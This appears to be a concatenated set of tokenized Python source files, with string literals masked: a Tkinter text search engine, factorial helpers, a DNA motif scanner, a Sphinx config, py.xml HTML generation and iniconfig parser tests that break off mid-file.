<s> import re <EOL> from tkinter import * <EOL> import tkinter . messagebox as tkMessageBox <EOL> def get ( root ) : <EOL> if not hasattr ( root , "<STR_LIT>" ) : <EOL> root . _searchengine = SearchEngine ( root ) <EOL> return root . _searchengine <EOL> class SearchEngine : <EOL> def __init__ ( self , root ) : <EOL> self . root = root <EOL> self . patvar = StringVar ( root ) <EOL> self . revar = BooleanVar ( root ) <EOL> self . casevar = BooleanVar ( root ) <EOL> self . wordvar = BooleanVar ( root ) <EOL> self . wrapvar = BooleanVar ( root ) <EOL> self . wrapvar . set ( <NUM_LIT:1> ) <EOL> self . backvar = BooleanVar ( root ) <EOL> def getpat ( self ) : <EOL> return self . patvar . get ( ) <EOL> def setpat ( self , pat ) : <EOL> self . patvar . set ( pat ) <EOL> def isre ( self ) : <EOL> return self . revar . get ( ) <EOL> def iscase ( self ) : <EOL> return self . casevar . get ( ) <EOL> def isword ( self ) : <EOL> return self . wordvar . get ( ) <EOL> def iswrap ( self ) : <EOL> return self . wrapvar . get ( ) <EOL> def isback ( self ) : <EOL> return self . backvar . get ( ) <EOL> def getcookedpat ( self ) : <EOL> pat = self . getpat ( ) <EOL> if not self . isre ( ) : <EOL> pat = re . escape ( pat ) <EOL> if self . isword ( ) : <EOL> pat = r"<STR_LIT>" % pat <EOL> return pat <EOL> def getprog ( self ) : <EOL> pat = self . getpat ( ) <EOL> if not pat : <EOL> self . report_error ( pat , "<STR_LIT>" ) <EOL> return None <EOL> pat = self . getcookedpat ( ) <EOL> flags = <NUM_LIT:0> <EOL> if not self . iscase ( ) : <EOL> flags = flags | re . IGNORECASE <EOL> try : <EOL> prog = re . compile ( pat , flags ) <EOL> except re . error as what : <EOL> try : <EOL> msg , col = what <EOL> except : <EOL> msg = str ( what ) <EOL> col = - <NUM_LIT:1> <EOL> self . report_error ( pat , msg , col ) <EOL> return None <EOL> return prog <EOL> def report_error ( self , pat , msg , col = - <NUM_LIT:1> ) : <EOL> msg = "<STR_LIT>" + str ( msg ) <EOL> if pat : <EOL> msg = msg + "<STR_LIT>" + str ( pat ) <EOL> if col >= <NUM_LIT:0> : <EOL> msg = msg + "<STR_LIT>" + str ( col ) <EOL> tkMessageBox . showerror ( "<STR_LIT>" , <EOL> msg , master = self . root ) <EOL> def setcookedpat ( self , pat ) : <EOL> if self . isre ( ) : <EOL> pat = re . escape ( pat ) <EOL> self . setpat ( pat ) <EOL> def search_text ( self , text , prog = None , ok = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> if not prog : <EOL> prog = self . getprog ( ) <EOL> if not prog : <EOL> return None <EOL> wrap = self . wrapvar . get ( ) <EOL> first , last = get_selection ( text ) <EOL> if self . isback ( ) : <EOL> if ok : <EOL> start = last <EOL> else : <EOL> start = first <EOL> line , col = get_line_col ( start ) <EOL> res = self . search_backward ( text , prog , line , col , wrap , ok ) <EOL> else : <EOL> if ok : <EOL> start = first <EOL> else : <EOL> start = last <EOL> line , col = get_line_col ( start ) <EOL> res = self . search_forward ( text , prog , line , col , wrap , ok ) <EOL> return res <EOL> def search_forward ( self , text , prog , line , col , wrap , ok = <NUM_LIT:0> ) : <EOL> wrapped = <NUM_LIT:0> <EOL> startline = line <EOL> chars = text . get ( "<STR_LIT>" % line , "<STR_LIT>" % ( line + <NUM_LIT:1> ) ) <EOL> while chars : <EOL> m = prog . search ( chars [ : - <NUM_LIT:1> ] , col ) <EOL> if m : <EOL> if ok or m . end ( ) > col : <EOL> return line , m <EOL> line = line + <NUM_LIT:1> <EOL> if wrapped and line > startline : <EOL> break <EOL> col = <NUM_LIT:0> <EOL> ok = <NUM_LIT:1> <EOL> chars = text . get ( "<STR_LIT>" % line , "<STR_LIT>" % ( line + <NUM_LIT:1> ) ) <EOL> if not chars and wrap : <EOL> wrapped = <NUM_LIT:1> <EOL> wrap = <NUM_LIT:0> <EOL> line = <NUM_LIT:1> <EOL> chars = text . get ( "<STR_LIT:1.0>" , "<STR_LIT>" ) <EOL> return None <EOL> def search_backward ( self , text , prog , line , col , wrap , ok = <NUM_LIT:0> ) : <EOL> wrapped = <NUM_LIT:0> <EOL> startline = line <EOL> chars = text . get ( "<STR_LIT>" % line , "<STR_LIT>" % ( line + <NUM_LIT:1> ) ) <EOL> while <NUM_LIT:1> : <EOL> m = search_reverse ( prog , chars [ : - <NUM_LIT:1> ] , col ) <EOL> if m : <EOL> if ok or m . start ( ) < col : <EOL> return line , m <EOL> line = line - <NUM_LIT:1> <EOL> if wrapped and line < startline : <EOL> break <EOL> ok = <NUM_LIT:1> <EOL> if line <= <NUM_LIT:0> : <EOL> if not wrap : <EOL> break <EOL> wrapped = <NUM_LIT:1> <EOL> wrap = <NUM_LIT:0> <EOL> pos = text . index ( "<STR_LIT>" ) <EOL> line , col = map ( int , pos . split ( "<STR_LIT:.>" ) ) <EOL> chars = text . get ( "<STR_LIT>" % line , "<STR_LIT>" % ( line + <NUM_LIT:1> ) ) <EOL> col = len ( chars ) - <NUM_LIT:1> <EOL> return None <EOL> def search_reverse ( prog , chars , col ) : <EOL> m = prog . search ( chars ) <EOL> if not m : <EOL> return None <EOL> found = None <EOL> i , j = m . span ( ) <EOL> while i < col and j <= col : <EOL> found = m <EOL> if i == j : <EOL> j = j + <NUM_LIT:1> <EOL> m = prog . search ( chars , j ) <EOL> if not m : <EOL> break <EOL> i , j = m . span ( ) <EOL> return found <EOL> def get_selection ( text ) : <EOL> try : <EOL> first = text . index ( "<STR_LIT>" ) <EOL> last = text . index ( "<STR_LIT>" ) <EOL> except TclError : <EOL> first = last = None <EOL> if not first : <EOL> first = text . index ( "<STR_LIT>" ) <EOL> if not last : <EOL> last = first <EOL> return first , last <EOL> def get_line_col ( index ) : <EOL> line , col = map ( int , index . split ( "<STR_LIT:.>" ) ) <EOL> return line , col </s>
<s> def factorial ( x ) : <EOL> if x <= <NUM_LIT:0.> : <EOL> if x == <NUM_LIT:0.> : return <NUM_LIT:1.> <EOL> else : raise ValueError ( '<STR_LIT>' % x ) <EOL> fact = <NUM_LIT:1.> <EOL> nn = <NUM_LIT> <EOL> while nn <= x : <EOL> fact = fact * nn <EOL> nn = nn + <NUM_LIT:1.> <EOL> if nn != x + <NUM_LIT:1> : raise ValueError ( '<STR_LIT>' % x ) <EOL> return fact <EOL> def combin ( x , y ) : <EOL> z = x - y <EOL> num = <NUM_LIT:1.0> <EOL> if y > z : <EOL> y , z = z , y <EOL> nn = int ( z + <NUM_LIT:1.> ) <EOL> while nn <= x : <EOL> num = num * nn <EOL> nn = nn + <NUM_LIT:1.> <EOL> if nn != x + <NUM_LIT:1> : raise ValueError ( '<STR_LIT>' % ( x , y ) ) <EOL> return num / factorial ( y ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> print ( '<STR_LIT>' , factorial ( <NUM_LIT:6> ) ) <EOL> print ( '<STR_LIT>' , combin ( <NUM_LIT:6> , <NUM_LIT:2> ) ) </s>
<s> import re <EOL> import sys <EOL> from readfq import readfq <EOL> complement = { '<STR_LIT:A>' : '<STR_LIT:T>' , '<STR_LIT:C>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:C>' , '<STR_LIT:T>' : '<STR_LIT:A>' , '<STR_LIT:N>' : '<STR_LIT:N>' } <EOL> if len ( sys . argv ) < <NUM_LIT:3> : <EOL> sys . exit ( "<STR_LIT>" ) <EOL> seqs = dict ( ) <EOL> infile = open ( sys . argv [ <NUM_LIT:1> ] ) <EOL> for name , seq , qual in readfq ( infile ) : <EOL> seqs [ name ] = seq <EOL> motif_str = sys . argv [ <NUM_LIT:2> ] . upper ( ) <EOL> motif_str_rc = "<STR_LIT>" . join ( [ complement [ b ] for b in motif_str [ : : - <NUM_LIT:1> ] ] ) <EOL> pat = "<STR_LIT>" % ( motif_str . replace ( "<STR_LIT:N>" , "<STR_LIT>" ) , motif_str_rc . replace ( "<STR_LIT:N>" , "<STR_LIT>" ) ) <EOL> motif = re . compile ( pat , flags = re . IGNORECASE ) <EOL> for name , seq in seqs . items ( ) : <EOL> matches = motif . finditer ( seq ) <EOL> for match in matches : <EOL> if match is not None : <EOL> if len ( sys . argv ) == <NUM_LIT:4> : <EOL> print "<STR_LIT:\t>" . join ( map ( str , ( name , match . start ( ) , match . end ( ) , sys . argv [ <NUM_LIT:3> ] ) ) ) <EOL> else : <EOL> print "<STR_LIT:\t>" . join ( map ( str , ( name , match . start ( ) , match . end ( ) ) ) ) </s>
<s> import sys <EOL> import os <EOL> import sphinx_rtd_theme <EOL> sys . path . append ( os . path . abspath ( '<STR_LIT>' ) ) <EOL> googleanalytics_id = '<STR_LIT>' <EOL> googleanalytics_enabled = True <EOL> extensions = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> extensions = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> disqus_shortname = '<STR_LIT>' <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ sphinx_rtd_theme . get_html_theme_path ( ) ] <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> '''<STR_LIT>''' <EOL> from os import name <EOL> from pypomvisualiser . display . TKinterDisplay import TKinterDisplay <EOL> class DisplayFactory ( object ) : <EOL> '''<STR_LIT>''' <EOL> @ staticmethod <EOL> def getDisplayMechanism ( ) : <EOL> if name is "<STR_LIT>" : <EOL> display = TKinterDisplay ( ) <EOL> return display <EOL> else : <EOL> display = TKinterDisplay ( ) <EOL> return display </s>
<s> from py . xml import html <EOL> paras = "<STR_LIT>" , "<STR_LIT>" <EOL> doc = html . html ( <EOL> html . head ( <EOL> html . meta ( name = "<STR_LIT:Content-Type>" , value = "<STR_LIT>" ) ) , <EOL> html . body ( <EOL> [ html . p ( p ) for p in paras ] ) ) <EOL> print unicode ( doc ) . encode ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import sys , re <EOL> if sys . version_info >= ( <NUM_LIT:3> , <NUM_LIT:0> ) : <EOL> def u ( s ) : <EOL> return s <EOL> def unicode ( x , errors = None ) : <EOL> if hasattr ( x , '<STR_LIT>' ) : <EOL> return x . __unicode__ ( ) <EOL> return str ( x ) <EOL> else : <EOL> def u ( s ) : <EOL> return unicode ( s ) <EOL> unicode = unicode <EOL> class NamespaceMetaclass ( type ) : <EOL> def __getattr__ ( self , name ) : <EOL> if name [ : <NUM_LIT:1> ] == '<STR_LIT:_>' : <EOL> raise AttributeError ( name ) <EOL> if self == Namespace : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> tagspec = self . __tagspec__ <EOL> if tagspec is not None and name not in tagspec : <EOL> raise AttributeError ( name ) <EOL> classattr = { } <EOL> if self . __stickyname__ : <EOL> classattr [ '<STR_LIT>' ] = name <EOL> cls = type ( name , ( self . __tagclass__ , ) , classattr ) <EOL> setattr ( self , name , cls ) <EOL> return cls <EOL> class Tag ( list ) : <EOL> class Attr ( object ) : <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . __dict__ . update ( kwargs ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( Tag , self ) . __init__ ( args ) <EOL> self . attr = self . Attr ( ** kwargs ) <EOL> def __unicode__ ( self ) : <EOL> return self . unicode ( indent = <NUM_LIT:0> ) <EOL> __str__ = __unicode__ <EOL> def unicode ( self , indent = <NUM_LIT:2> ) : <EOL> l = [ ] <EOL> SimpleUnicodeVisitor ( l . append , indent ) . visit ( self ) <EOL> return u ( "<STR_LIT>" ) . join ( l ) <EOL> def __repr__ ( self ) : <EOL> name = self . __class__ . __name__ <EOL> return "<STR_LIT>" % ( name , id ( self ) ) <EOL> Namespace = NamespaceMetaclass ( '<STR_LIT>' , ( object , ) , { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : Tag , <EOL> '<STR_LIT>' : False , <EOL> } ) <EOL> class HtmlTag ( Tag ) : <EOL> def unicode ( self , indent = <NUM_LIT:2> ) : <EOL> l = [ ] <EOL> HtmlVisitor ( l . append , indent , shortempty = False ) . visit ( self ) <EOL> return u ( "<STR_LIT>" ) . join ( l ) <EOL> class html ( Namespace ) : <EOL> __tagclass__ = HtmlTag <EOL> __stickyname__ = True <EOL> __tagspec__ = dict ( [ ( x , <NUM_LIT:1> ) for x in ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) . split ( '<STR_LIT:U+002C>' ) if x ] ) <EOL> class Style ( object ) : <EOL> def __init__ ( self , ** kw ) : <EOL> for x , y in kw . items ( ) : <EOL> x = x . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) <EOL> setattr ( self , x , y ) <EOL> class raw ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , uniobj ) : <EOL> self . uniobj = uniobj <EOL> class SimpleUnicodeVisitor ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , write , indent = <NUM_LIT:0> , curindent = <NUM_LIT:0> , shortempty = True ) : <EOL> self . write = write <EOL> self . cache = { } <EOL> self . visited = { } <EOL> self . indent = indent <EOL> self . curindent = curindent <EOL> self . parents = [ ] <EOL> self . shortempty = shortempty <EOL> def visit ( self , node ) : <EOL> """<STR_LIT>""" <EOL> cls = node . __class__ <EOL> try : <EOL> visitmethod = self . cache [ cls ] <EOL> except KeyError : <EOL> for subclass in cls . __mro__ : <EOL> visitmethod = getattr ( self , subclass . __name__ , None ) <EOL> if visitmethod is not None : <EOL> break <EOL> else : <EOL> visitmethod = self . __object <EOL> self . cache [ cls ] = visitmethod <EOL> visitmethod ( node ) <EOL> def __object ( self , obj ) : <EOL> self . write ( escape ( unicode ( obj ) ) ) <EOL> def raw ( self , obj ) : <EOL> self . write ( obj . uniobj ) <EOL> def list ( self , obj ) : <EOL> assert id ( obj ) not in self . visited <EOL> self . visited [ id ( obj ) ] = <NUM_LIT:1> <EOL> for elem in obj : <EOL> self . visit ( elem ) <EOL> def Tag ( self , tag ) : <EOL> assert id ( tag ) not in self . visited <EOL> try : <EOL> tag . parent = self . parents [ - <NUM_LIT:1> ] <EOL> except IndexError : <EOL> tag . parent = None <EOL> self . visited [ id ( tag ) ] = <NUM_LIT:1> <EOL> tagname = getattr ( tag , '<STR_LIT>' , tag . __class__ . __name__ ) <EOL> if self . curindent and not self . _isinline ( tagname ) : <EOL> self . write ( "<STR_LIT:\n>" + u ( '<STR_LIT:U+0020>' ) * self . curindent ) <EOL> if tag : <EOL> self . curindent += self . indent <EOL> self . write ( u ( '<STR_LIT>' ) % ( tagname , self . attributes ( tag ) ) ) <EOL> self . parents . append ( tag ) <EOL> for x in tag : <EOL> self . visit ( x ) <EOL> self . parents . pop ( ) <EOL> self . write ( u ( '<STR_LIT>' ) % tagname ) <EOL> self . curindent -= self . indent <EOL> else : <EOL> nameattr = tagname + self . attributes ( tag ) <EOL> if self . _issingleton ( tagname ) : <EOL> self . write ( u ( '<STR_LIT>' ) % ( nameattr , ) ) <EOL> else : <EOL> self . write ( u ( '<STR_LIT>' ) % ( nameattr , tagname ) ) <EOL> def attributes ( self , tag ) : <EOL> attrlist = dir ( tag . attr ) <EOL> attrlist . sort ( ) <EOL> l = [ ] <EOL> for name in attrlist : <EOL> res = self . repr_attribute ( tag . attr , name ) <EOL> if res is not None : <EOL> l . append ( res ) <EOL> l . extend ( self . getstyle ( tag ) ) <EOL> return u ( "<STR_LIT>" ) . join ( l ) <EOL> def repr_attribute ( self , attrs , name ) : <EOL> if name [ : <NUM_LIT:2> ] != '<STR_LIT>' : <EOL> value = getattr ( attrs , name ) <EOL> if name . endswith ( '<STR_LIT:_>' ) : <EOL> name = name [ : - <NUM_LIT:1> ] <EOL> if isinstance ( value , raw ) : <EOL> insert = value . uniobj <EOL> else : <EOL> insert = escape ( unicode ( value ) ) <EOL> return '<STR_LIT>' % ( name , insert ) <EOL> def getstyle ( self , tag ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> styledict = tag . style . __dict__ <EOL> except AttributeError : <EOL> return [ ] <EOL> else : <EOL> stylelist = [ x + '<STR_LIT>' + y for x , y in styledict . items ( ) ] <EOL> return [ u ( '<STR_LIT>' ) % u ( '<STR_LIT>' ) . join ( stylelist ) ] <EOL> def _issingleton ( self , tagname ) : <EOL> """<STR_LIT>""" <EOL> return self . shortempty <EOL> def _isinline ( self , tagname ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> class HtmlVisitor ( SimpleUnicodeVisitor ) : <EOL> single = dict ( [ ( x , <NUM_LIT:1> ) for x in <EOL> ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . split ( '<STR_LIT:U+002C>' ) ] ) <EOL> inline = dict ( [ ( x , <NUM_LIT:1> ) for x in <EOL> ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . split ( '<STR_LIT:U+0020>' ) ) ] ) <EOL> def repr_attribute ( self , attrs , name ) : <EOL> if name == '<STR_LIT>' : <EOL> value = getattr ( attrs , name ) <EOL> if value is None : <EOL> return <EOL> return super ( HtmlVisitor , self ) . repr_attribute ( attrs , name ) <EOL> def _issingleton ( self , tagname ) : <EOL> return tagname in self . single <EOL> def _isinline ( self , tagname ) : <EOL> return tagname in self . inline <EOL> class _escape : <EOL> def __init__ ( self ) : <EOL> self . escape = { <EOL> u ( '<STR_LIT:">' ) : u ( '<STR_LIT>' ) , u ( '<STR_LIT:<>' ) : u ( '<STR_LIT>' ) , u ( '<STR_LIT:>>' ) : u ( '<STR_LIT>' ) , <EOL> u ( '<STR_LIT:&>' ) : u ( '<STR_LIT>' ) , u ( "<STR_LIT:'>" ) : u ( '<STR_LIT>' ) , <EOL> } <EOL> self . charef_rex = re . compile ( u ( "<STR_LIT:|>" ) . join ( self . escape . keys ( ) ) ) <EOL> def _replacer ( self , match ) : <EOL> return self . escape [ match . group ( <NUM_LIT:0> ) ] <EOL> def __call__ ( self , ustring ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> ustring = unicode ( ustring ) <EOL> except UnicodeDecodeError : <EOL> ustring = unicode ( ustring , '<STR_LIT:utf-8>' , errors = '<STR_LIT:replace>' ) <EOL> return self . charef_rex . sub ( self . _replacer , ustring ) <EOL> escape = _escape ( ) </s>
<s> import py <EOL> import pytest <EOL> from py . _iniconfig import IniConfig , ParseError , __all__ as ALL <EOL> from py . _iniconfig import iscommentline <EOL> from textwrap import dedent <EOL> def pytest_generate_tests ( metafunc ) : <EOL> if '<STR_LIT:input>' in metafunc . funcargnames : <EOL> for name , ( input , expected ) in check_tokens . items ( ) : <EOL> metafunc . addcall ( id = name , funcargs = { <EOL> '<STR_LIT:input>' : input , <EOL> '<STR_LIT>' : expected , <EOL> } ) <EOL> elif hasattr ( metafunc . function , '<STR_LIT>' ) : <EOL> kwargs = metafunc . function . multi . kwargs <EOL> names , values = zip ( * kwargs . items ( ) ) <EOL> values = cartesian_product ( * values ) <EOL> for p in values : <EOL> metafunc . addcall ( funcargs = dict ( zip ( names , p ) ) ) <EOL> def cartesian_product ( L , * lists ) : <EOL> if not lists : <EOL> for x in L : <EOL> yield ( x , ) <EOL> else : <EOL> for x in L : <EOL> for y in cartesian_product ( lists [ <NUM_LIT:0> ] , * lists [ <NUM_LIT:1> : ] ) : <EOL> yield ( x , ) + y <EOL> check_tokens = { <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , '<STR_LIT>' , None , None ) ] <EOL> ) , <EOL> '<STR_LIT:value>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , None , '<STR_LIT:value>' , '<STR_LIT:1>' ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , '<STR_LIT>' , None , None ) , ( <NUM_LIT:1> , '<STR_LIT>' , '<STR_LIT:value>' , '<STR_LIT:1>' ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , None , '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , None , '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , '<STR_LIT>' , None , None ) , ( <NUM_LIT:2> , '<STR_LIT>' , '<STR_LIT:value>' , '<STR_LIT:1>' ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , None , '<STR_LIT:value>' , '<STR_LIT:1>' ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , '<STR_LIT>' , None , None ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , '<STR_LIT>' , None , None ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , None , '<STR_LIT:name>' , '<STR_LIT>' ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , None , '<STR_LIT:value>' , '<STR_LIT>' ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , None , '<STR_LIT:name>' , '<STR_LIT:y>' ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , None , '<STR_LIT:value>' , '<STR_LIT>' ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , None , '<STR_LIT:value>' , '<STR_LIT>' ) ] <EOL> ) , <EOL> } <EOL> def parse ( input ) : <EOL> ini = object . __new__ ( IniConfig ) <EOL> ini . path = "<STR_LIT>" <EOL> return ini . _parse ( input . splitlines ( True ) ) <EOL> def parse_a_error ( input ) : <EOL> return py . test . raises ( ParseError , parse , input ) <EOL> def test_tokenize ( input , expected ) : <EOL> parsed = parse ( input ) <EOL> assert parsed == expected <EOL> def test_parse_empty ( ) : <EOL> parsed = parse ( "<STR_LIT>" ) <EOL> assert not parsed <EOL> ini = IniConfig ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> assert not ini . sections <EOL> def test_ParseError ( ) : <EOL> e = ParseError ( "<STR_LIT:filename>" , <NUM_LIT:0> , "<STR_LIT:hello>" ) <EOL> assert str ( e ) == "<STR_LIT>" <EOL> def test_continuation_needs_perceeding_token ( ) : <EOL> excinfo = parse_a_error ( '<STR_LIT>' ) <EOL> assert excinfo . value . lineno == <NUM_LIT:0> <EOL> def test_continuation_cant_be_after_section ( ) : <EOL> excinfo = parse_a_error ( '<STR_LIT>' ) <EOL> assert excinfo . value . lineno == <NUM_LIT:1> <EOL> def test_section_cant_be_empty ( ) : <EOL> excinfo = parse_a_error ( '<STR_LIT>' ) <EOL> @ py . test . mark . multi ( line = [ <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> def test_error_on_weird_lines ( line ) : <EOL> parse_a_error ( line ) <EOL> def test_iniconfig_from_file ( tmpdir ) : <EOL> path = tmpdir / '<STR_LIT>' <EOL> path . write ( '<STR_LIT>' ) <EOL> config = IniConfig ( path = path ) <EOL> assert list ( config . sections ) == [ '<STR_LIT>' ] <EOL> config = IniConfig ( path , "<STR_LIT>" ) <EOL> assert list ( config . sections ) == [ '<STR_LIT>' ] <EOL> py . test . raises ( TypeError , "<STR_LIT>" ) <EOL> def test_iniconfig_section_first ( tmpdir ) : <EOL> excinfo = py . test . raises ( ParseError , """<STR_LIT>""" ) <EOL> assert excinfo . value . msg == "<STR_LIT>" <EOL> def test_iniconig_section_duplicate_fails ( ) : <EOL> excinfo = py . test . raises ( ParseError , r"""<STR_LIT>""" ) <EOL> assert '<STR_LIT>' in str ( excinfo . value ) <EOL> def test_iniconfig_duplicate_key_fails ( ) : <EOL> excinfo = py . test . raises ( ParseError , r"""<STR_LIT>""" ) <EOL> assert '<STR_LIT>' in str ( excinfo . value ) <EOL> def test_iniconfig_lineof ( ) : <EOL> config = IniConfig ( "<STR_LIT>" , data = <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> assert config . lineof ( '<STR_LIT>' ) is None <EOL> assert config . lineof ( '<STR_LIT>' ) == <NUM_LIT:1> <EOL> assert config . lineof ( '<STR_LIT>' ) == <NUM_LIT:3> <EOL> assert config . lineof ( '<STR_LIT>' , '<STR_LIT:value>' ) == <NUM_LIT:2> <EOL> assert config . lineof ( '<STR_LIT>' , '<STR_LIT:value>' ) == <NUM_LIT:5> <EOL> assert config [ '<STR_LIT>' ] . lineof ( '<STR_LIT:value>' ) == <NUM_LIT:2> <EOL> assert config [ '<STR_LIT>' ] . lineof ( '<STR_LIT:value>' ) == <NUM_LIT:5> <EOL> def test_iniconfig_get_convert ( ) : <EOL> config = IniConfig ( "<STR_LIT:x>" , data = '<STR_LIT>' ) <EOL> assert config . get ( '<STR_LIT>' , '<STR_LIT:int>' ) == '<STR_LIT:1>' <EOL> assert config . get ( '<STR_LIT>' , '<STR_LIT:int>' , convert = int ) == <NUM_LIT:1> <EOL> def test_iniconfig_get_missing ( ) : <EOL> config = IniConfig ( "<STR_LIT:x>" , data = '<STR_LIT>' ) <EOL> assert config . get ( '<STR_LIT>' , '<STR_LIT>' , default = <NUM_LIT:1> ) == <NUM_LIT:1> <EOL> assert config . get ( '<STR_LIT>' , '<STR_LIT>' ) is None <EOL> def test_section_get ( ) : <EOL> config = IniConfig ( "<STR_LIT:x>" , data = '<STR_LIT>' ) <EOL> section = config [ '<STR_LIT>' ] <EOL> assert section . get ( '<STR_LIT:value>' , convert = int ) == <NUM_LIT:1> <EOL> assert section . get ( '<STR_LIT:value>' , <NUM_LIT:1> ) == "<STR_LIT:1>" <EOL> assert section . get ( '<STR_LIT>' , <NUM_LIT:2> ) == <NUM_LIT:2> <EOL> def test_missing_section ( ) : <EOL> config = IniConfig ( "<STR_LIT:x>" , data = '<STR_LIT>' ) <EOL> py . test . raises ( KeyError , '<STR_LIT>' ) <EOL> def test_section_getitem ( ) : <EOL> config = IniConfig ( "<STR_LIT:x>" , data = '<STR_LIT>' ) <EOL> assert config [ '<STR_LIT>' ] [ '<STR_LIT:value>' ] == '<STR_LIT:1>' <EOL> assert config [ '<STR_LIT>' ] [ '<STR_LIT:value>' ] == '<STR_LIT:1>' <EOL> def test_section_iter ( ) : <EOL> config = IniConfig ( "<STR_LIT:x>" , data = '<STR_LIT>' ) <EOL> names = list ( config [ '<STR_LIT>' ] ) <EOL> assert names == [ '<STR_LIT:value>' ] <EOL> items = list ( config [ '<STR_LIT>' ] . items ( ) ) <EOL> assert items == [ ( '<STR_LIT:value>' , '<STR_LIT:1>' ) ] <EOL> def test_config_iter ( ) : <EOL> config = IniConfig ( "<STR_LIT>" , data = dedent ( '''<STR_LIT>''' ) ) <EOL> l = list ( config ) <EOL> assert len ( l ) == <NUM_LIT:2> <EOL> assert l [ <NUM_LIT:0> ] . name == '<STR_LIT>' <EOL> assert l [ <NUM_LIT:0> ] [ '<STR_LIT:value>' ] == '<STR_LIT:1>' <EOL> assert l [ <NUM_LIT:1> ] . name == '<STR_LIT>' <EOL> assert l [ <NUM_LIT:1> ] [ '<STR_LIT:value>' ] == '<STR_LIT:2>' <EOL> def test_config_contains ( ) : <EOL> config = IniConfig ( "<STR_LIT>" , data = dedent ( '''<STR_LIT>''' ) ) <EOL> assert '<STR_LIT>' not in config <EOL> assert '<STR_LIT>' in config <EOL> assert '<STR_LIT>' in config <EOL> def test_iter_file_order ( ) : <EOL> config = IniConfig ( "<STR_LIT>" , data = """<STR_LIT>""" ) <EOL> l = list ( config ) <EOL> secnames = [ x . name for x in l ] <EOL> assert secnames == [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> assert list ( config [ '<STR_LIT>' ] ) == [ '<STR_LIT:value>' , '<STR_LIT>' ] <EOL> assert list ( config [ 